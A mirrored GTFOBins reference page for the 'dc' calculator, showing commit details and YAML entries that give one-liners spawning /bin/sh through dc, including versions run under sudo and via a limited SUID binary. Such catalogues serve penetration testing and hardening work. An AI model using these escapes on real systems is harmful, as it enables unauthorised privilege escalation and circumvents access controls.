1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/dc.md
Andrea Cardaci 6696d463cd Restore bash
Closes #426.
2023-12-03 09:26:12 +01:00

10 lines
146 B
Markdown

---
functions:
shell:
- code: dc -e '!/bin/sh'
sudo:
- code: sudo dc -e '!/bin/sh'
limited-suid:
- code: ./dc -e '!/bin/sh'
---